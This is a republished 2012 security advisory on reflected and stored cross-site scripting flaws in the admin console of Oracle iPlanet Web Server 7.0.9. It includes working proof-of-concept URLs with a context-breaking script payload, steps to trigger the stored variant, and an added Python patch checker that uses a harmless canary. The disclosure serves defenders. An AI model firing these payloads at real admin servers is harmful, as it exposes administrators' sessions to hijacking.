Saturday, 28 April 2012

Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Posted on 21:01 by freda
Description
Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. The issues were found in a default installation of Oracle iPlanet Web Server 7.0.9; earlier versions may also be affected. All affected pages sit under /admingui on the administration server (the proof of concept uses its port 8800), so they are reachable only by whoever can browse the admin console. The practical risk is an authenticated administrator being lured to one of the URLs below and having script executed in the context of the admin session.

Proof of concept
The payload '"--></style></script><script>alert(/XSS/)</script> used in every URL is deliberately context-agnostic: it closes a single- or double-quoted attribute, an HTML comment, a <style> block and a <script> block before opening its own script, so it executes regardless of where in the page the parameter value is written. For Masthead.jsp each of the three parameters is tested on its own, with the other parameters left at the values the page normally uses.

Reflected XSS
=============
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script>

Stored XSS
==========
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script>

To trigger Stored XSS:
======================
Requesting either of the two Navigator URLs above persists the injected value; the script then runs when the navigator is loaded again with an ordinary request that carries no payload, for example:

http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=
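The following checker is an added example for verifying the patch; it is not part of the advisory and not Oracle's code. Instead of alert() it injects the advisory's context-breaking prefix followed by a random canary tag, and reports a parameter as still vulnerable only if that tag comes back in the response unescaped (the patched form should return it as &lt;...&gt;). The host in ADMIN_BASE is an assumed placeholder, and the Masthead renderer and HelpNavigator class are constructed stand-ins for the server side so the checker runs offline; against a real server, replace them with HTTP requests to the URLs that probe_url() builds and feed the response bodies to the same checks.

```python
"""Patch verification for the admin-GUI XSS parameters in this advisory.

Added example (not part of the advisory and not Oracle's code). The JSP
renderer and the stored-value mechanism below are constructed stand-ins
used to exercise the checker offline.
"""
import html
import secrets
from urllib.parse import urlencode

# Prefix from the PoC: closes a quoted attribute, an HTML comment, a <style>
# block and a <script> block, so the payload fires in any of those contexts.
BREAKOUT = "'\"--></style></script>"

# Assumed placeholder host; 8800 is the admin server port used in the PoC.
ADMIN_BASE = "http://admin.example.internal:8800"

MASTHEAD = "/admingui/version/Masthead.jsp"
MASTHEAD_BASE = {                      # baseline values from the PoC URLs
    "productNameSrc": "../images/VersionProductName.png",
    "versionFile": "../version/copyright?__token__=",
    "productNameHeight": "42",
    "productNameWidth": "221",
}
NAVIGATOR = "/admingui/cchelp2/Navigator"
NAVIGATOR_BASE = {"windowTitle": "", "firstLoad": "true", "appName": "admingui",
                  "helpFile": "", "pathPrefix": ""}
REFLECTED_PARAMS = ("productNameSrc", "productNameHeight", "productNameWidth")
STORED_PARAMS = ("appName", "pathPrefix")


def make_canary() -> str:
    """Harmless random marker that cannot occur in a normal page."""
    return "xsschk" + secrets.token_hex(4)


def probe_url(path: str, base: dict, param: str, canary: str) -> str:
    """URL with BREAKOUT + <canary> in one parameter, other values untouched."""
    params = dict(base)
    params[param] = BREAKOUT + "<" + canary + ">"
    return ADMIN_BASE + path + "?" + urlencode(params)


def unescaped(body: str, canary: str) -> bool:
    """Vulnerable only if the raw tag is present; &lt;canary&gt; means fixed."""
    return "<" + canary + ">" in body


# ---- constructed stand-ins for the server side (not the real JSPs) ----
def render_masthead(params: dict, patched: bool) -> str:
    """Writes the three PoC parameters into attributes, encoded only if patched."""
    enc = html.escape if patched else (lambda s: s)
    return ('<img src="%s" height="%s" width="%s">'
            % tuple(enc(params[p]) for p in REFLECTED_PARAMS))


class HelpNavigator:
    """Keeps every appName/pathPrefix it has seen and lists them on each load,
    so a value sent once reappears on a later, clean request (stored XSS)."""
    def __init__(self, patched: bool):
        self.enc = html.escape if patched else (lambda s: s)
        self.seen = []

    def request(self, params: dict) -> str:
        self.seen.extend(params[p] for p in STORED_PARAMS)
        return "<ul>%s</ul>" % "".join("<li>%s</li>" % self.enc(v) for v in self.seen)


def check_reflected(render) -> dict:
    """One fresh canary per parameter; maps parameter -> still vulnerable."""
    result = {}
    for p in REFLECTED_PARAMS:
        canary = make_canary()
        params = dict(MASTHEAD_BASE, **{p: BREAKOUT + "<" + canary + ">"})
        result[p] = unescaped(render(params), canary)
    return result


def check_stored(nav: HelpNavigator) -> dict:
    """Two steps as in the advisory: plant the payload, then load the clean
    trigger URL (appName=TESTING) and inspect only that second response."""
    result = {}
    for p in STORED_PARAMS:
        canary = make_canary()
        nav.request(dict(NAVIGATOR_BASE, **{p: BREAKOUT + "<" + canary + ">"}))
        trigger = nav.request(dict(NAVIGATOR_BASE, appName="TESTING"))
        result[p] = unescaped(trigger, canary)
    return result


if __name__ == "__main__":
    print(probe_url(MASTHEAD, MASTHEAD_BASE, "productNameSrc", make_canary()))
    print("unpatched reflected:", check_reflected(lambda q: render_masthead(q, False)))
    print("patched   reflected:", check_reflected(lambda q: render_masthead(q, True)))
    print("unpatched stored:   ", check_stored(HelpNavigator(patched=False)))
    print("patched   stored:   ", check_stored(HelpNavigator(patched=True)))
```

The canary is checked only in the response to the clean trigger request for the stored case, which is the distinction that matters: a value that merely echoes in the planting request is reflected, not stored. Using a random tag rather than alert() also keeps the check usable against a production admin server, where popping a dialog in an administrator's browser is not an acceptable test.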

Solution
Oracle has released patches which address these issues as part of the April 2012 Critical Patch Update. Please see the references for more information.

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS
Secunia: http://secunia.com/advisories/43942/

Disclosure Timeline
2011-03-29 - Vulnerabilities discovered.
2011-03-29 - Vulnerabilities reported to Secunia.
2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.
2012-04-17 - Patch released.
2012-04-18 - Advisory published by Secunia.